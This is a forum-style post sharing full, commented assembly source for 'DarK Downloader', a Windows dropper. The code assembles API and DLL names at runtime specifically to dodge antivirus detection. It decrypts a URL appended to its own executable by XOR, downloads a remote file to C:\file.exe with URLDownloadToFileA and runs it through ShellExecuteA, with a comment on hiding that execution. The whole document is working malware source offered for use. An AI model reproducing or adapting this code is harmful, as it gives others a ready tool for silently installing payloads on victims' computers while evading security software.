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[+]Von: ringwrath-4
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;DarK Downloader by ringwrath-4

;Compile using fasmw (Flat Assembler for Windows) - www.flatassembler.net
include '%include%/WIN32AX.INC'                 ;include extended Win32 API

.data                                           ;start .data section
    _dlstr db "C:\file.exe",0                   ;local file location 
    UrlDownload rd 18                           ;reserve 18 bytes for URLDownloadToFileA API
    dllurl rd 10                                ;reserve 10 bytes for urlmon.dll
    self rb 256d                                ;reserve 256 bytes for Path of the .exe
    fBuffer rb 256d                             ;reserve 256 bytes for buffering the URL
    dllhandle rd 1                              ;reserve a dword for dllhandle      
    DownloadFile rd 1                           ;reserve another dword for the API Address
    myfile rd 1                                 ;reserve dword for file handle
    fsize rd 1                                  ;reserve dword for filesize
    fpointer rd 1                               ;reserve dword for filepointer
    bread dd 0                                  ;put a 0 into bread for bytes read...       
    nullstr db '',0                             ;empty string for ShellExecute

    ;-------------------------------------------------Fill dllurl (filling because antivirus programs detect 'URLMON.DLL' in the executable file, if we write the string at runtime its not in the executable
    mov dword [dllurl], 'U4LM'          ;and cant be detected by AV's that easy)
    mov dword [dllurl+4d], 'ON.D'
    mov word [dllurl+8d], 'LL'
    mov byte [dllurl+1d], 'R'
    ;------------------------------------------------Get DLL Handle 
    push dllurl                                 ;Push dllurl = 'URLMON.DLL' onto stack              
    call [LoadLibraryA]                         ;call API LoadLibraryA to load URLMON.DLL
    mov [dllhandle],eax                         ;move the result into dllhandle

    ;------------------------------------------------ Fill UrlDownload (same thing as above with urlmon.dll)
    mov dword [UrlDownload], 'UROD'
    mov dword [UrlDownload+4d], 'ownl'
    mov dword [UrlDownload+8d], 'oadT'
    mov dword [UrlDownload+12d], 'oGil'
    mov word [UrlDownload+16d], 'eA'
    mov byte [UrlDownload+2d], 'L'
    mov byte [UrlDownload+13d], 'F'
    ;-------------------------------------------------Get API Address   
    push UrlDownload                            ;push UrlDownload = 'URLDownloadToFileA' onto stack
    push [dllhandle]                            ;push dllhandle onto stack
    call [GetProcAddress]                       ;GetProcAddress to get the procedure address of URLDownloadToFileA
    mov [DownloadFile],eax                      ;move the result into DownloadFile
    ;-------------------------------------------------Get settings of builded .exe
    ;-------------------------------------------------Get File path and name
    push 256d                                   ;push 256d onto stack, so the api will know we only have 256 bytes for the filename (256 bytes is much!)
    push self                                   ;push buffer of 256 bytes onto stack
    push 0                                      ;push 0 onto stack
    call [GetModuleFileNameA]                   ;Gives out the filename into buffer 'self'
    ;--------------------------------------------------Open File and read buffer
    push 0                                      ;push 0 onto stack
    push 0                                      ;push 0 onto stack
    push OPEN_EXISTING                          ;push OPEN_EXISTING onto stack, so the file will be opened and not created
    push 0                                      ;push 0 onto  stack
    push 0                                      ;push 0 onto stack
    push GENERIC_READ                           ;push GENERIC_READ onto stack because we only want to read the file
    push self                                   ;push name of the .exe onto stack
    call [CreateFile]                           ;Opens the file with parameters on stack
    mov [myfile],eax                            ;move the result (file handle) from eax to myfile
    push 0                                      ;push a 0 onto stack
    push [myfile]                               ;pushes filehandle 'myfile' onto stack
    call [GetFileSize]                          ;gets the filesize
    mov [fsize],eax                             ;move result from eax to fsize
    sub [fsize], 2560                           ;substract 2560 of filesize to get the length of URL
    push FILE_BEGIN                             ;push FILE_BEGIN onto stack, it symbolizes to Set the new FilePointer to 2560 like 2 lines under this
    push 0                                      ;push 0 onto stack...
    push 2560                                   ;push 2560 onto stack, this is the filesize of .exe if unmodified
    push [myfile]                               ;push filehandle onto stack
    call [SetFilePointer]                       ;call api SetFilePointer to set the file pointer on 2560
    mov [fpointer],eax                          ;move eax to fpointer (we dont need this though)
    push 0                                      ;push 0 onto stack
    push bread                                  ;push 'bytesread' onto stack
    push [fsize]                                ;push filesize onto stack
    push fBuffer                                ;push filebuffer onto stack
    push [myfile]                               ;push filehandle onto stack
    call [ReadFile]                             ;reads the URL out of file
    push [myfile]                               ;push filehandle onto stack
    call [CloseHandle]                          ;Close Filehandle 'myfile'
    ;-------------------------------------------------decrypt urlstr
    push fBuffer                                ;push fBuffer (your URL) onto the stack
    call [lstrlenA]                             ;call the api lstrlenA, it gives out the length of our URL
    mov ecx, eax                                ;move the length of the URL into ecx
    sub ecx, 1                                  ;substract 1 from the length, this is because we dont want to have a NULL char at the end of our URL
    mov ebx, 0                                  ;move a 0 into ebx
    xor byte [fBuffer] , 12d                    ;xor the first character of the URL (decrypt)
    sd:                                         ;this is a loop marker
    inc ebx                                     ;increment register ebx, so we have the address to next character in the URL
    xor byte [fBuffer+ebx] , 12d                ;xor that char

    cmp ebx, ecx                                ;compare both registers, the length of the buffer and  the incremented counter
    jne sd                                      ;if its not equal jmp back to sd, our loop marker
    pop ebx
    pop ecx
    pop eax
    ;--------------------------------------------------download file
    push 0                                      ;push a 0 onto the stack
    push 0                                      ;another one...
    push _dlstr                                 ;push _dlstr = yourfile onto the stack
    push fBuffer                                ;push _urlstr = yourfile onto the stack
    push 0                                      ;push another 0 onto the stack
    call [DownloadFile]                         ;calls the API URLDownloadToFileA - this will download the file
    ;-------------------------------------------------Open file (execute)
    push SW_SHOWNORMAL                          ;push SW_SHOWNORMAL constant onto the stack, use SW_HIDE to hide the execution of your file
    push nullstr                                ;push the empty string onto stack
    push nullstr                                ;push another empty string onto stack
    push _dlstr                                 ;push the local location of your file onto the stack
    push nullstr                                ;push another empty string onto stack
    push HWND_DESKTOP                           ;use HWND_DESKTOP as the parent handle of the executed file
    call [ShellExecuteA]                        ;call ShellExecuteA API to open/execute your file
    ;--------------------------------------------------end program
    push 0                                      ;push 0 onto the stack
    call [ExitProcess]                          ;should explain itself ^^
.end main                                       ;end procedure main

Package: DarK-Downloader